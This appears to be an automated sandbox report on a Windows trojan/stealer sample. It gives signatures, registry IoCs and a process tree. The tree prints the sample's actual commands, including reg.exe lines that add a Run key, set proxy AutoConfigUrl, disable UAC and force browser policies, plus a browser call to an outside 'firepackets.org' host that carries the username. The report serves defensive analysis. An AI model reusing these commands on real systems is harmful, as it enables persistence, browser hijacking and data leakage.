eb052448c64afaf6802f6a20f8f01f613c6d292caaa506d89c885255fee277bc

Analysis

max time kernel
86s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
23-01-2024 17:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

701e8508940b27e0b6f25ad054299679.exe
Size

23KB
MD5

701e8508940b27e0b6f25ad054299679
SHA1

e0a02e3fb6a107b265dc8555224feb5dbc66df54
SHA256

eb052448c64afaf6802f6a20f8f01f613c6d292caaa506d89c885255fee277bc
SHA512

1704857f4c5f656ddc969040b88d0562fba348ef1af4a1b30991a3e2ec77307e3d640e3d2ea9e46d4719037815d6484d5939a74eb2f86243a8ab545e4a29fabc
SSDEEP

384:zSdr9sOcIp6wRcsSYLvKWLWbstQTid6HJyraXkqdkJ7PNWo7/tiX1HaNJawcudo2:zSFmOhplcsHvKWzX6HJmFqda7kortjng

Score

10^/10

evasion persistence spyware stealer trojan upx

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	701e8508940b27e0b6f25ad054299679.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	cmd.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1852-0-0x0000000000400000-0x0000000000414000-memory.dmp	upx
behavioral2/memory/1852-139-0x0000000000400000-0x0000000000414000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ActiveX Update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\AxUpdateMS.exe"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 56 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTSR"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "516086873"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b056cf20204eda01	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "516243017"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IESS02&market={language}"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Internet Explorer\User Preferences	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\DefaultScope = "{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTLogoURL = "http://go.microsoft.com/fwlink/?LinkID=403856&language={language}&scale={scalelevel}&contrast={contrast}"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\3DB9590C4C4C26C4CCBDD94ECAD790359708C3267B = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000003c221304981e5f4bbaa9a99b1399bd8a000000000200000000001066000000010000200000001aebbb458e4d87f022b831b1e9906b1f292b54f72d426161484afa9c16406b48000000000e800000000200002000000077086119f687d5a19c9dcc2d719996a11dfffdea0d8d945902d2115bf8b4db4f50000000f2faa1f4d478f8be160d14c6ac28c44009c4b989924d50fa3a55f5b99ce72937fb4d961e521472aca7c5c665709bfcb7f9f3d8ec069db76b1eb0636c18ccfddf17444de06f31a6e0b082124e5bf18e2340000000033f99b9cd9ea3c9bd0afe7b3250800f41fe674c9d0875eb85cc843b76b8f8401514c49b20da43818c26afd9a9a22ad4bf2b4fc5bee679982a91c049c2580d85	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000003c221304981e5f4bbaa9a99b1399bd8a000000000200000000001066000000010000200000003d61157cb7ef6d4a038a408be650145d2fe791c96420e5fc57f450e96fc6d577000000000e800000000200002000000017dd017bccd71e508ed006a74e184f7237268ad2b75b6fa12ee201d64762ec7c20000000b168fc4e6ad807e78269f55ab18cf3d79ff20d5eb91c847c7fa300d0311e2f8b40000000db261bb7fa025be345b269ed6c94d98a393879fcd103966cd1fb98a91a28ae4479af12d185b93f71f525318c9884acb8f28659aa27464d9dda79e1f59f7677af	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURL = "http://www.bing.com/favicon.ico"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IESS02&market={language}"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\UpgradeTime = 0d1285d26635da01	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0e5cc20204eda01	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\2BB20B33B4171CDAAB6469225AE6A582ED33D7B488 = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000003c221304981e5f4bbaa9a99b1399bd8a000000000200000000001066000000010000200000009c336f4995c7c5f31b175cdac19825da9c8dd930f3e8b3800f41df170446ccd6000000000e80000000020000200000004d3448ce6254b9540cd682963811453713023189be213491da4710def3decdee100000004de56341fcc32379ba805f8ea98da6c3400000007a9da2a421e8ee15aba0d14479f4bec8c7386db4c4756efe07e11f7e85f5a98455b22937c6799cc455354b0e946446174004d108363479b36ca8f0b6451c5b23	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "525774732"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31084064"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "412795226"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURLFallback = "http://www.bing.com/favicon.ico"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTTopResultURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTTR"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31084064"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31084064"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{4A5BB2C5-BA13-11EE-AA35-5A0B45D0E1CE} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\Version = "5"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTSuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&market={language}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IENTSS"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTLogoPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000003c221304981e5f4bbaa9a99b1399bd8a00000000020000000000106600000001000020000000a115a5329e40b00e6706010c8e1f9683bf74c02395f1edd532df14c2d6963898000000000e8000000002000020000000401928a6b92058a8e08b9e2d8773cec0738fbbd662a4da35f89bc93963acd22520000000334c994088529d25cf0e9c0c2720c938b3310141e52f5740a3fb3a216971e48340000000e762d4a1c5ef2db9b26ed8f27da036ee587d2464ef2131b60e8fb33b84937d9a13a7fa755df8798bd5bca5b3dc4ab922b3bd1419d8d77c61931b41939acde1c2	iexplore.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
2432	PING.EXE
4084	PING.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
324	iexplore.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
324	iexplore.exe
324	iexplore.exe
2688	IEXPLORE.EXE
2688	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1852 wrote to memory of 2816	1852	701e8508940b27e0b6f25ad054299679.exe	88
PID 1852 wrote to memory of 2816	1852	701e8508940b27e0b6f25ad054299679.exe	88
PID 1852 wrote to memory of 2816	1852	701e8508940b27e0b6f25ad054299679.exe	88
PID 2816 wrote to memory of 1720	2816	cmd.exe	91
PID 2816 wrote to memory of 1720	2816	cmd.exe	91
PID 2816 wrote to memory of 1720	2816	cmd.exe	91
PID 2816 wrote to memory of 4508	2816	cmd.exe	92
PID 2816 wrote to memory of 4508	2816	cmd.exe	92
PID 2816 wrote to memory of 4508	2816	cmd.exe	92
PID 2816 wrote to memory of 324	2816	cmd.exe	93
PID 2816 wrote to memory of 324	2816	cmd.exe	93
PID 2816 wrote to memory of 2432	2816	cmd.exe	94
PID 2816 wrote to memory of 2432	2816	cmd.exe	94
PID 2816 wrote to memory of 2432	2816	cmd.exe	94
PID 2816 wrote to memory of 2004	2816	cmd.exe	95
PID 2816 wrote to memory of 2004	2816	cmd.exe	95
PID 2816 wrote to memory of 2004	2816	cmd.exe	95
PID 2816 wrote to memory of 4376	2816	cmd.exe	96
PID 2816 wrote to memory of 4376	2816	cmd.exe	96
PID 2816 wrote to memory of 4376	2816	cmd.exe	96
PID 4376 wrote to memory of 4084	4376	cmd.exe	97
PID 4376 wrote to memory of 4084	4376	cmd.exe	97
PID 4376 wrote to memory of 4084	4376	cmd.exe	97
PID 4376 wrote to memory of 4716	4376	cmd.exe	98
PID 4376 wrote to memory of 4716	4376	cmd.exe	98
PID 4376 wrote to memory of 4716	4376	cmd.exe	98
PID 324 wrote to memory of 2688	324	iexplore.exe	99
PID 324 wrote to memory of 2688	324	iexplore.exe	99
PID 324 wrote to memory of 2688	324	iexplore.exe	99
PID 2816 wrote to memory of 2804	2816	cmd.exe	100
PID 2816 wrote to memory of 2804	2816	cmd.exe	100
PID 2816 wrote to memory of 2804	2816	cmd.exe	100
PID 2816 wrote to memory of 2924	2816	cmd.exe	101
PID 2816 wrote to memory of 2924	2816	cmd.exe	101
PID 2816 wrote to memory of 2924	2816	cmd.exe	101
PID 2816 wrote to memory of 2600	2816	cmd.exe	102
PID 2816 wrote to memory of 2600	2816	cmd.exe	102
PID 2816 wrote to memory of 2600	2816	cmd.exe	102
PID 2816 wrote to memory of 1064	2816	cmd.exe	103
PID 2816 wrote to memory of 1064	2816	cmd.exe	103
PID 2816 wrote to memory of 1064	2816	cmd.exe	103
PID 2816 wrote to memory of 4404	2816	cmd.exe	104
PID 2816 wrote to memory of 4404	2816	cmd.exe	104
PID 2816 wrote to memory of 4404	2816	cmd.exe	104
PID 2816 wrote to memory of 1008	2816	cmd.exe	105
PID 2816 wrote to memory of 1008	2816	cmd.exe	105
PID 2816 wrote to memory of 1008	2816	cmd.exe	105
PID 2816 wrote to memory of 2564	2816	cmd.exe	106
PID 2816 wrote to memory of 2564	2816	cmd.exe	106
PID 2816 wrote to memory of 2564	2816	cmd.exe	106
PID 2816 wrote to memory of 2304	2816	cmd.exe	107
PID 2816 wrote to memory of 2304	2816	cmd.exe	107
PID 2816 wrote to memory of 2304	2816	cmd.exe	107
PID 2816 wrote to memory of 4700	2816	cmd.exe	108
PID 2816 wrote to memory of 4700	2816	cmd.exe	108
PID 2816 wrote to memory of 4700	2816	cmd.exe	108
PID 2816 wrote to memory of 4644	2816	cmd.exe	109
PID 2816 wrote to memory of 4644	2816	cmd.exe	109
PID 2816 wrote to memory of 4644	2816	cmd.exe	109
PID 2816 wrote to memory of 3152	2816	cmd.exe	110
PID 2816 wrote to memory of 3152	2816	cmd.exe	110
PID 2816 wrote to memory of 3152	2816	cmd.exe	110
PID 2816 wrote to memory of 3520	2816	cmd.exe	111
PID 2816 wrote to memory of 3520	2816	cmd.exe	111

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4984	attrib.exe
404	attrib.exe
2980	attrib.exe

C:\Users\Admin\AppData\Local\Temp\701e8508940b27e0b6f25ad054299679.exe
"C:\Users\Admin\AppData\Local\Temp\701e8508940b27e0b6f25ad054299679.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1852
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4D74.tmp\Untitled.bat" "
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1720
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "ActiveX Update" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\AxUpdateMS.exe"
    3⤵
    - Adds Run key to start application
    PID:4508
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" "juju.firepackets.org/ads.php?a=Admin&b=ZHCNTALV"
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:324
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:324 CREDAT:17410 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2688
- - C:\Windows\SysWOW64\PING.EXE
    C:\Windows\system32\ping.exe www.google.com.br -n 1 -l 1
    3⤵
    - Runs ping.exe
    PID:2432
- - C:\Windows\SysWOW64\find.exe
    find "TTL"
    3⤵
    PID:2004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\system32\ping.exe ju.firepackets.org -l 1 -n 1 | C:\Windows\system32\find.exe "TTL"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4376
  - - C:\Windows\SysWOW64\PING.EXE
      C:\Windows\system32\ping.exe ju.firepackets.org -l 1 -n 1
      4⤵
      Runs ping.exe
      PID:4084
  - - C:\Windows\SysWOW64\find.exe
      C:\Windows\system32\find.exe "TTL"
      4⤵
      PID:4716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2804
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "file://C:\Users\Admin\AppData\Local\Temp/KB_ZHCNTALV.txt" /f
    3⤵
    PID:2924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2600
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t reg_dword /d 00000001 /f
    3⤵
    PID:1064
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4404
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t reg_dword /d 00000000 /f
    3⤵
    PID:1008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2564
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t reg_dword /d 00000000 /f
    3⤵
    PID:2304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4700
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "AdvancedTab" /t reg_dword /d 00000001 /f
    3⤵
    PID:4644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3152
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
    3⤵
    PID:3520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2636
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "Autoconfig" /t reg_dword /d 00000001 /f
    3⤵
    PID:5100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1372
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "file://C:\Users\Admin\AppData\Local\Temp/KB_ZHCNTALV.txt" /f
    3⤵
    PID:1184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t reg_dword /d 00000001 /f
    3⤵
    PID:4060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2272
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t reg_dword /d 00000000 /f
    3⤵
    PID:4824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3216
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t reg_dword /d 00000000 /f
    3⤵
    PID:1232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3800
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "Autoconfig" /t reg_dword /d 00000001 /f
    3⤵
    PID:1308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4948
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "AdvancedTab" /t reg_dword /d 00000001 /f
    3⤵
    PID:1400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4776
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4680
- - C:\Windows\SysWOW64\reg.exe
